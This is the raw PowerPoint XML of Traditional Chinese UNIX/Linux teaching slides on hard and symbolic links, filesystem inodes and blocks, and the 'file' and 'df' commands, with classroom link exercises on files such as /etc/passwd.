            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/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硬連結與符號連結比較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1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763640" y="2606040"/>
              <a:ext cx="1228320" cy="655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47800" y="2542680"/>
                <a:ext cx="126000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649840" y="2638800"/>
              <a:ext cx="75132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34000" y="2575080"/>
                <a:ext cx="7830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873240" y="2606040"/>
              <a:ext cx="1228320" cy="6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57400" y="2542680"/>
                <a:ext cx="12600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263000" y="2619000"/>
              <a:ext cx="738360" cy="136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247160" y="2555640"/>
                <a:ext cx="7700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161800" y="3017520"/>
              <a:ext cx="1829160" cy="525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145960" y="2954160"/>
                <a:ext cx="186084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345680" y="3579120"/>
              <a:ext cx="84924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329480" y="3515760"/>
                <a:ext cx="8812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2449440" y="3553200"/>
              <a:ext cx="18972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433600" y="3489480"/>
                <a:ext cx="221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200400" y="3559680"/>
              <a:ext cx="4173840" cy="6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184560" y="3495960"/>
                <a:ext cx="42055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8229600" y="3572640"/>
              <a:ext cx="241920" cy="201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213760" y="3509280"/>
                <a:ext cx="2736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417320" y="3984120"/>
              <a:ext cx="1026000" cy="266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401480" y="3920760"/>
                <a:ext cx="10576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3879720" y="3990600"/>
              <a:ext cx="3448800" cy="201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863880" y="3927240"/>
                <a:ext cx="34804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437120" y="4421880"/>
              <a:ext cx="189720" cy="3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20920" y="4358160"/>
                <a:ext cx="221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103120" y="4428360"/>
              <a:ext cx="2129760" cy="68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087280" y="4364640"/>
                <a:ext cx="216144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3702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UNIX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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX是一套</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>多人多工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的作業系統，大多應用在工作站等級以上的電腦。在此類的電腦系統環境中，使用者只要擁有一套終端機設備，就可以透過UNIX的管理使用電腦主機的資源來完成自己的工作，並且不必擔心互相影響的問題。</a:t>
            </a:r>
          </a:p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986400" y="1587240"/>
              <a:ext cx="875520" cy="262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70560" y="1523520"/>
                <a:ext cx="90720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987824" y="1772816"/>
              <a:ext cx="3632040" cy="72360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback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71984" y="1709456"/>
                <a:ext cx="3663720" cy="19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9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硬連結不能連結目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>因為目錄的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>中，計算連結數的欄位已經有其他的用途，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>所以無法讓硬連結使用，符號連結可以指向任何目錄，並可如同真的目錄一樣地使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>硬連結與符號連結各有其限制，所以您必須依時機與用途，選擇適合的方式使用。</a:t>
            </a:r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硬連結與符號連結比較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66600" y="1573920"/>
              <a:ext cx="3142080" cy="4608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50760" y="1510560"/>
                <a:ext cx="31737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696840" y="1580760"/>
              <a:ext cx="67968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681000" y="1517040"/>
                <a:ext cx="7113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944240" y="2488320"/>
              <a:ext cx="1463400" cy="201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928400" y="2424960"/>
                <a:ext cx="14950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6714360" y="2612520"/>
              <a:ext cx="126108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698520" y="2549160"/>
                <a:ext cx="1292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926720" y="2984760"/>
              <a:ext cx="444600" cy="136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910880" y="2921400"/>
                <a:ext cx="47628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8216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 smtClean="0"/>
              <a:t>新增一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”joe”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>目錄，將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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>/log/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>複製到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>目錄下，檔案名稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”wtmp1”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>硬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>連結方式，將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>/log/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案連結到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>目錄下，檔案連結名稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”wtmp2”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 smtClean="0"/>
              <a:t>將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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>/hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案使用符號連結方式，檔名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”hosts3”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/>
              <a:t>觀察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>複製、硬連結過來及符號連結過來的檔案屬性變化。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0">
              <a:buNone/>
            </a:pPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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29400"/>
            <a:ext cx="9144000" cy="3328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8823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將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>複製到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>底下，檔名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”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/>
              <a:t>以不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>佔用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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄下的磁碟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>空間</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>方式，將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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>連結成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>passwd1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，請觀察目錄容量是否有變動。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案，建立捷徑，檔名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>’passwd2’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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2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8" y="7029400"/>
            <a:ext cx="9117732" cy="758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5919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新增一個目錄為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>lke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>lke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄內新增兩個檔案為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”a”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”b”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>lke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄內，將檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>連結檔名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”a1”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/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”b”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案建立連結捷徑為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”b1”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>最後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>著將原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”a”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”b”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案作刪除動作，再去讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”a1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”b1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案，是否能作讀取。</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>3</a:t>
            </a:r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78" y="7029400"/>
            <a:ext cx="6245911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927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endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>五、檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>系統特性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728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檔案系統特性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="53.jp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 l="21787" t="53873" r="20802"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007604" y="2949496"/>
            <a:ext cx="7128792" cy="3908504"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="內容版面配置區 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1266825"/>
            <a:ext cx="8229600" cy="485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dirty="0" smtClean="0"/>
              <a:t>Superblock:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>紀錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的整體資訊。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>紀錄檔案的屬性及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>位置等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>block:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>實際記錄檔案的內容。</a:t>
            </a:r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901800" y="2184480"/>
              <a:ext cx="889200" cy="320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5960" y="2120760"/>
                <a:ext cx="9208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2952720" y="2139840"/>
              <a:ext cx="146736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936880" y="2076480"/>
                <a:ext cx="14990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5327640" y="2203560"/>
              <a:ext cx="1499040" cy="64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11800" y="2139840"/>
                <a:ext cx="15307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888840" y="2717640"/>
              <a:ext cx="902160" cy="766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73000" y="2654280"/>
                <a:ext cx="93384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2984400" y="2736720"/>
              <a:ext cx="2337120" cy="702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968560" y="2673360"/>
                <a:ext cx="236880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914400" y="1530360"/>
              <a:ext cx="1759320" cy="637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98560" y="1467000"/>
                <a:ext cx="17910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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3917880" y="1549440"/>
              <a:ext cx="2406960" cy="892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02040" y="1485720"/>
                <a:ext cx="243864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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6114960" y="1536840"/>
              <a:ext cx="1257840" cy="572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099120" y="1473120"/>
                <a:ext cx="1289520" cy="18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6462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dirty="0" smtClean="0"/>
              <a:t>file :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>觀察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>檔案類型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="內容版面配置區 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1266824"/>
            <a:ext cx="8229600" cy="5186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600" dirty="0" smtClean="0"/>
              <a:t>file :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>觀察檔案的類型與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>型態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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>可用於資訊鑑識確認檔案是否有被藏檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>找出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>即 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>這兩個檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可知道這兩個檔案分別是文字檔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(ASCII text) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及執行檔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(ELF 64-bit LSB...)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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4176312"/>
            <a:ext cx="7245596" cy="194421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999360" y="1502280"/>
              <a:ext cx="640440" cy="198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83520" y="1438560"/>
                <a:ext cx="67212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1802880" y="1567440"/>
              <a:ext cx="3723120" cy="594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86680" y="1504080"/>
                <a:ext cx="375516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5120640" y="3579120"/>
              <a:ext cx="2312640" cy="594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104800" y="3515760"/>
                <a:ext cx="234432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1645920" y="3912480"/>
              <a:ext cx="3129120" cy="198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630080" y="3848760"/>
                <a:ext cx="3160800" cy="14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486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dirty="0" err="1" smtClean="0"/>
              <a:t>df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>看硬碟空間使用量的指令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="60.jp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 l="4635" t="39324" r="21610"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="823640" y="3501008"/>
            <a:ext cx="7496720" cy="3356992"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="內容版面配置區 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1266825"/>
            <a:ext cx="8229600" cy="485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600" dirty="0" err="1"/>
              <a:t>df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
